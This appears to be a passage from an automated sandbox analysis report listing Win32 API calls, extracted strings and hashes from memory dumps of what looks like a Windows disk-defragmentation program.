                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CriticalEnterExecuteSectionShell
                                                                                                                                                                                                                                                                                    • String ID: /e,/select,"%s%s"$8F$explorer.exe$open
                                                                                                                                                                                                                                                                                    • API String ID: 206244367-1918814442
                                                                                                                                                                                                                                                                                    • Opcode ID: 16f18f1a933ed431d929bf9bf4f35c33f1afd78cf992d5ee3e1820be59300b6a
                                                                                                                                                                                                                                                                                    • Instruction ID: 9e016845d88e4024dd1218f79a327356caeee79904b42a6c0a28c628b7da3379
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16f18f1a933ed431d929bf9bf4f35c33f1afd78cf992d5ee3e1820be59300b6a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2691E0712047009BD710EF24DD85FDAB7E5BF98704F00092EF945AB286DB78E945CBAA
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000133D,00000000,00000001), ref: 0042CE5B
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105,?,BB40E64E,?,?,?,?,?,?,?,?,?,004217B6), ref: 0042CEBD
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0042CEF4
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042CF49
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$RedrawWindow
                                                                                                                                                                                                                                                                                    • String ID: %s (%c:)$%s (%s)$3401034$3401126$8F
                                                                                                                                                                                                                                                                                    • API String ID: 648961319-806376751
                                                                                                                                                                                                                                                                                    • Opcode ID: e1afdf9b5f9a6a0a3f1bdb0e24b03c0913b1775ab901b2b3f138c93be5904649
                                                                                                                                                                                                                                                                                    • Instruction ID: fd74af85edc4f78d52bbe53b36b76dc0b3b7e67d0ab5ffb778a9a62391dde0ea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1afdf9b5f9a6a0a3f1bdb0e24b03c0913b1775ab901b2b3f138c93be5904649
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E718D716043409FD324DF64DD85FABBBF4EF88700F10492EFA5A96290DBB4A944CB5A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00456B14
                                                                                                                                                                                                                                                                                      • Part of subcall function 00454290: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00454306
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 00456B57
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00456B7E
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00456BA5
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00000000), ref: 00456BD6
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000001,00000000), ref: 00456C07
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000001,00000001), ref: 00456C38
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00456C5F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle$CreateFileUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID: \\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 1066634676-259948872
                                                                                                                                                                                                                                                                                    • Opcode ID: 39a1f70db7202d3b1c3ce52b526e9e0b0aae69084ae2661cf5f3dced9512c8e9
                                                                                                                                                                                                                                                                                    • Instruction ID: 9c2aacaccead671dbc3a96f70d0e1eab3c71fbf61e1a23b3dd7d7caf89dd1f7c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39a1f70db7202d3b1c3ce52b526e9e0b0aae69084ae2661cf5f3dced9512c8e9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C75109377043006BD214AF69AC86BAEB394EF9C725F80013FF509D3282DA255548C7AB
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00465A5F
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00465A78
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00465B27
                                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00465B49
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00465B61
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00465BA5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$ClientMessageParentReleaseSendWindow
                                                                                                                                                                                                                                                                                    • String ID: 8F$Button_Check$F
                                                                                                                                                                                                                                                                                    • API String ID: 330964712-3764646934
                                                                                                                                                                                                                                                                                    • Opcode ID: aafe33e43f13557e9fd3d95a85fa062db54e1fb928152b145d4fd0b75ee94390
                                                                                                                                                                                                                                                                                    • Instruction ID: b1a5f572caf67006923a9ef52c219ce68de25ddbd2c2a7f7615237fc757273c6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aafe33e43f13557e9fd3d95a85fa062db54e1fb928152b145d4fd0b75ee94390
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0510371600B019FD324DF79C889BA7B3E9BF88704F008A1DE5AA97281DB74B854CF59
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,BB40E64E), ref: 00421BFF
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00421C0A
                                                                                                                                                                                                                                                                                    • LoadMenuW.USER32(00000000), ref: 00421C48
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(?,00000001), ref: 00421C73
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$CursorLoadRectWindow
                                                                                                                                                                                                                                                                                    • String ID: 3401014$3401015$3401098$3401131$^H
                                                                                                                                                                                                                                                                                    • API String ID: 539701409-2488738715
                                                                                                                                                                                                                                                                                    • Opcode ID: f201b73e3f44a350be9c0be91d5a56932565eb1e6c8c0a690cc3ab9f05582354
                                                                                                                                                                                                                                                                                    • Instruction ID: aabc8bb0dc6c93bda9c7aa98bf8ca1edfc519584f33f3993db52bfb4b78a6ed8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f201b73e3f44a350be9c0be91d5a56932565eb1e6c8c0a690cc3ab9f05582354
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A41B6B17543406AD324AB65DC42FAF73A8AF84B14F108A1FB65EA26C0CE7CA405879D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,?), ref: 004027B1
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,?), ref: 00402863
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402041$3402042$8F$DiskDefrag$Images$close$open
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2649565445
                                                                                                                                                                                                                                                                                    • Opcode ID: cdc453c516630b020ec0cec2833834f757ecf7b414e406f0a32de656b7e70e72
                                                                                                                                                                                                                                                                                    • Instruction ID: 8150cbd10707325bb4a07bc8764e9056bc1ba0aa629cfab9f1adae748ae802a6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdc453c516630b020ec0cec2833834f757ecf7b414e406f0a32de656b7e70e72
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8319EB579020027D61576254EA6FBE21661FC4B48F25C22FB30E7B3C2DEED9C41429E
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0042EAE3
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 0042EAF7
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 0042EB36
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402007$3402033$3402037$3402038$3402039$3402040
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-3173017236
                                                                                                                                                                                                                                                                                    • Opcode ID: 6cbccfbbc1fd63c8a78153f1b809b30710d94fdfea326ecc7c254d81bae311d8
                                                                                                                                                                                                                                                                                    • Instruction ID: f302c9e8cacf912969436f53e573b816ab0f893bb8e7c3a9347613e7e3a9d812
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cbccfbbc1fd63c8a78153f1b809b30710d94fdfea326ecc7c254d81bae311d8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0021D7F0BE074035E6B5BA614D43FEE21295F84F49F20880BB75E7A9C2CADC3941629D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: f91c71cdff771b475ab66cf7fa24957df628f7f2d51a469e190cf7c95d6e8a29
                                                                                                                                                                                                                                                                                    • Instruction ID: be2023aef89e17b54fd3cfd96c880170c5f98da2cba37ae09b4ebda1ed5f38f7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f91c71cdff771b475ab66cf7fa24957df628f7f2d51a469e190cf7c95d6e8a29
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79C1F4B56083448FC310DF69C884A5BFBE9BFC9714F148A5EE9888B361C775E905CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CopyRect
                                                                                                                                                                                                                                                                                    • String ID: Bottom$Left$Margin$Right$Top$`=$=
                                                                                                                                                                                                                                                                                    • API String ID: 1989077687-1885521073
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: 3401059$3401060$3401061$3401062$<a>%s</a>$LG
                                                                                                                                                                                                                                                                                    • API String ID: 0-1992925794
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 004181B6
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,00000006), ref: 00418204
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,000003FD), ref: 0041827F
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,000003FD), ref: 004182FA
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041833E
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00418350
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000003,0000FFFE), ref: 004183AA
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RectWindow$ClientMessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 1071774122-180763933
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 004298F0: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000004FF), ref: 00429964
                                                                                                                                                                                                                                                                                      • Part of subcall function 004298F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0042998F
                                                                                                                                                                                                                                                                                      • Part of subcall function 004298F0: TranslateMessage.USER32(?), ref: 0042999A
                                                                                                                                                                                                                                                                                      • Part of subcall function 004298F0: DispatchMessageW.USER32(?), ref: 004299A1
                                                                                                                                                                                                                                                                                      • Part of subcall function 004298F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004299B0
                                                                                                                                                                                                                                                                                      • Part of subcall function 004298F0: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000004FF), ref: 004299C9
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00424612
                                                                                                                                                                                                                                                                                      • Part of subcall function 00424C20: SendMessageW.USER32(?,000010A9,?,00000000), ref: 00424C61
                                                                                                                                                                                                                                                                                      • Part of subcall function 00424C20: SetForegroundWindow.USER32(?), ref: 00424C6D
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000111,00000001,00000000), ref: 0042452F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Message$MultipleObjectsPeekSendWait$DispatchForegroundPostTranslateWindow
                                                                                                                                                                                                                                                                                    • String ID: "RightMenuDisk"$"RightMenuFile"$-AutoDefragmention$-BootTimeDefrag$8F$ScheduleStart
                                                                                                                                                                                                                                                                                    • API String ID: 784092869-485786108
                                                                                                                                                                                                                                                                                    • Opcode ID: ee24571ea037fb3441c670c01d318203056eea9a33b6edfe6f81c85abbded570
                                                                                                                                                                                                                                                                                    • Instruction ID: c97898347ab5420be132615685895ca4f66fbeb7c47801a8b84119e28bf46611
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee24571ea037fb3441c670c01d318203056eea9a33b6edfe6f81c85abbded570
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E251C431304310AFC300EF15EDC5A6BB7E4EBD8755F84092EF54A92291DBB89988CB5A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll,NtQuerySystemInformation), ref: 00419B01
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00419B08
                                                                                                                                                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(00497F28), ref: 00419C49
                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(00497F30), ref: 00419C54
                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00419C70
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00419C9C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: PerformanceQuery$Counter$AddressFrequencyHandleModuleProcUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID: NtQuerySystemInformation$ntdll
                                                                                                                                                                                                                                                                                    • API String ID: 3025674679-3593917365
                                                                                                                                                                                                                                                                                    • Opcode ID: 3125494ca8bbf67271106e3f1c2de1996966a1ae5acd7d052624fdc1ffea64cd
                                                                                                                                                                                                                                                                                    • Instruction ID: d06557f50192d5db3270ba6b6212bac26de826900838c4c68c4281c4e513f8d9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3125494ca8bbf67271106e3f1c2de1996966a1ae5acd7d052624fdc1ffea64cd
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF518F71B1C301ABD7149F11FD55AAA37E4FB98780F108C3EE585A2268FB3499418BDD
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,0000000C,00000000), ref: 00454A46
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000), ref: 00454ABC
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,00090064,00000000,00000000,00000340,00000060,00000003,00000000), ref: 00454AE8
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00454AFA
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandleInformationVolume
                                                                                                                                                                                                                                                                                    • String ID: C:\$JD$NTFS$\\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 1233574911-3889828498
                                                                                                                                                                                                                                                                                    • Opcode ID: 0b712c942aafd56dc5bdacd96f40fd37a890dc6406218b81da3fa3882dbb5d1c
                                                                                                                                                                                                                                                                                    • Instruction ID: 7a7ffa21548745985fbbbea45252e330d1802da0f0ea7318edadfa9cc625902c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b712c942aafd56dc5bdacd96f40fd37a890dc6406218b81da3fa3882dbb5d1c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE311D71608300AFE320CF64D885B6BB7F8AF88714F400A2DF549D7291E7B5E584CB5A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102F,?,00000000), ref: 0042D3DB
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D3F8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D411
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D433
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D46C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$Selected$`=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-3927076241
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000004FF), ref: 00429964
                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0042998F
                                                                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0042999A
                                                                                                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 004299A1
                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004299B0
                                                                                                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000004FF), ref: 004299C9
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
                                                                                                                                                                                                                                                                                    • String ID: 0I$@I
                                                                                                                                                                                                                                                                                    • API String ID: 1800058468-400931512
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ActiveMessageWindow
                                                                                                                                                                                                                                                                                    • String ID: 3400001$3400101$3401090$rY
                                                                                                                                                                                                                                                                                    • API String ID: 3610105657-3605576623
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00416BBB
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00416BCF
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00416BDE
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000198,00000000,?), ref: 00416BFF
                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 00416C10
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000198,?,?), ref: 00416C74
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 00416C87
                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 00416C98
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?), ref: 00416CC7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$MessageSend$Invalidate$ClientCursorScreen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2454936240-0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 005FE960
                                                                                                                                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 005FEA6E
                                                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 005FEBC0
                                                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 005FEBDB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                    • API String ID: 2751267872-393685449
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 004318DA
                                                                                                                                                                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 004319AA
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00431B90
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00431BCE
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00431BEF
                                                                                                                                                                                                                                                                                    • AlphaBlend.MSIMG32(?,?,?,?,00000003,?,00000000,00000000,?,00000003,00000000,00000000,00000000,?,?,00F0F0F0), ref: 00431C5D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreateRect$AlphaBitmapBlendCopyFrameObjectSelect
                                                                                                                                                                                                                                                                                    • String ID: Z
                                                                                                                                                                                                                                                                                    • API String ID: 54210234-1505515367
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 004012D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004768A9,000000FF), ref: 00401305
                                                                                                                                                                                                                                                                                      • Part of subcall function 004012D0: LeaveCriticalSection.KERNEL32(00497DC0,?,?,?,?,?,?,004768A9,000000FF), ref: 00401316
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDC.USER32(00000000), ref: 004650D8
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004650E9
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004650F0
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,00000058), ref: 004650F9
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00465108
